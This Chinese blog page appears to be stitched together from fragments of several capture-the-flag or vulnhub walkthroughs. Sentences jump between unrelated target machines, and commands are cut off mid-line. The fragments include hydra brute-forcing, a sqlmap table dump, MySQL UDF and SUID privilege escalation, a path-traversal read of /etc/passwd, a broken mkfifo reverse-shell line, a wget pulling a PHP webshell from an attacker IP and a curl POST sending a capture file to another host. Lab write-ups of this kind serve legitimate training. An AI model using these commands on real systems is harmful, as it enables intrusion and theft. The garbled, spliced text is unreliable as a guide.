anddddoooo的博客

看到一个敏感信息，在以Keep this safe!为标题的post下的内容如下。主页面是apache2的默认页面，没有robots.txt，我们直接扫描目录。发现wordpress之后，查看wordpress主页。写python脚本，将数据包中的信息转成hydra命令。burp抓包保存请求头到raj文件中，raj文件如下。主页翻了翻，没有什么敏感信息，尝试hydra爆破。此外这个脚本是777权限。hydra爆破用户名。

1.3.5版本有个file copy的漏洞：看了poc得知，这了漏洞是未授权的敏感文件读写，那么影响力一定很大。交互的地方也比较少，看看url参数f是否有本地文件包含，最终结果当然没有，一般这种系统也不会出现这么低级错误。21端口ProFTPD 是1.2.10版本，我们着重挑选1.2.10的版本后的漏洞，我注意到了。21，80，22尝试枚举足够多的敏感信息加渗透，然后再查看这三个端口是否有服务漏洞。这么多端口：995，993，465，143，587，110，25都是邮箱服务。

mysql udf是mysql的用户自定义函数，我们将函数存放在动态链接库中，那么这个动态链接库的所有者就是mysql创建udf时所使用的用户，恰好现在以root身份登录mysql，代表着我们能使用root将udf写入一个动态链接库，提权需要调用这个恶意函数，这还需要我们借助mysql的root权限来调用恶意函数。字段不多直接--dump-all这张表：sqlmap -r raj --batch --dbs -D Webapp -T Users --dump-all --time-sec 1。

它允许您使用私钥加密和数字签名文件和电子邮件通信，并使用随附的公钥解密这些文件和通信。通常，使用 GnuPG 加密的文件会以.gpg扩展名保存。这表示它们已加密，可以使用 GnuPG 解密。但是，要解密 GPG 文件，您必须拥有必要的 GnuPG 密钥（通常是其他用户的公钥）。这里根据bob目录下的note.sh文件，推测passphrase是个藏头诗：HARPOCRATES。访问80，是个学校官网，查看整个页面没有敏感信息，查看robots.txt。login.txt.gpg文件有被加密的字符串。

直接：echo "mkfifo /tmp/f;| unclestinky | *9B776AFB479B31E8047026F1185E952DD1E530CB | <===========用来登录 wordpress。直接再靶机上：curl -X POST --data-binary @./derpissues.pcap http://192.168.159.47:8000/

此靶机的目的是让你提高对小型信息的敏感度，让你更注重细节。

现在目录扫描：gobuster dir -u http://192.168.148.131/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt --add-slash。4.> /tmp/f 2>&1：这个命令是将/bin/sh执行的结果（标准输出）重定向到/tmp/f文件，2>&1表示标准错误输出也向标准输出那样处理，重定向到/tmp/f文件。

尝试过/usr/bin/sudoedit，看到了一个关于sudoedit的漏洞正好与sudo版本匹配，exploit db编号是470.c，但好像越权读取文件的，我们不需要。收集到4个可能是管理员创建的用户，加上root5个用户vmware、obama、osama、yomama、root。两个脚本都看看，发现2017.pl脚本有利用提示，直接选择利用更简单的perl脚本。好家伙，直接webmin爆出了个文件披露的漏洞，还成功了，直接用就完事了。传到靶机，编译，运行，root。这下可以尝试破解下hash了。

运行suid的程序时，这个程序的进程euid是创建者的用户id，且按照euid的权限执行进程代码，这意味着我们如果这个程序能调用/bin/sh，他的权限将会按照euid的身份新起一个拥有euid权限的会话shell。注：但是调用/bin/bash将不会提权，因为/bin/bash在启动后，首先判断euid和ruid是否相同，如果不相同，他会利用权限更低的ruid（如果ruid的权限比euid低），自动进行降权处理。/usr/bin/python2.7 是最有可能提权的，基本上板上钉钉了。

看完攻略后才知道，密码是Pass.txt，它其实是个文件名，但是文件名就是密码，博主解释说因为this_folder_contains_the-password意思是这个文件夹本身就是密码。最主要是上面选中的三个包，RETR是客户端ftp的请求命令，服务器响应，ftp-data包里包含请求文件secret_stuff.txt文件的内容。然后分析，这里面大多是tcp和ftp的包，tcp的都是握手包直接过滤，仅查看ftp和ftp-data包，如下图。

他用完了他的烧瓶，开始使用商用级油漆溶剂。这是一个安全的密码吗？或者是保险箱的密码？exiftools解析一下Safe_Password.jpg，没有任何内容，但观察这个图片的文件名，可以知道其可能存放着密码，直接strings查看文件中出现的字符串，发现密码。密码可能就是131333，而且是rick正在使用的，既然是rick正在使用的密码，那么这个密码究竟应用在rick的什么的地方呢。-rw-r--r--. 1 root root 414 8月 22 2017 journal.txt.zip。

这些信息是phpmyadmin登录凭据，不能使用ssh登录，既然我们有了sql注入能查询数据库所有内容，我们也不需要phpmyadmin的登录凭据了。-D mysql -T --dump：选定mysql库，thetable表，显示出thetable表所有内容。可以去网站https://hashes.com/en/decrypt/hash做破解，也可以使用john破解，在这里我们使用工具john。方法2：ln -s /bin/sh ps（创建一个/bin/sh的快捷方式）

这台靶机的名字叫“误导”，字如其名，无数信息看似敏感实则无用。

那么http://192.168.18.1/sar2HTML/index.php?网上找一个webshell，这里我找的php的webshell，文件命名为shell.php，记得将webshell的ip和port配置为攻击机器。请求http://192.168.18.1/sar2HTML/index.php?目标机器：wget http://192.168.18.47:8000/shell.php。需要输入url：http://192.168.18.1/sar2HTML/

file=../../../../../../../etc/passwd，发现本地文件包含lfi漏洞，能读取服务器敏感文件/etc/passwd。首先要查看knock的配置文件，寻找服务器对knock的配置，其配置存放在/etc/knockd下，通过lfi漏洞查看。能够以root权限调用/opt/devstuff/dist/test/test文件，允许一下。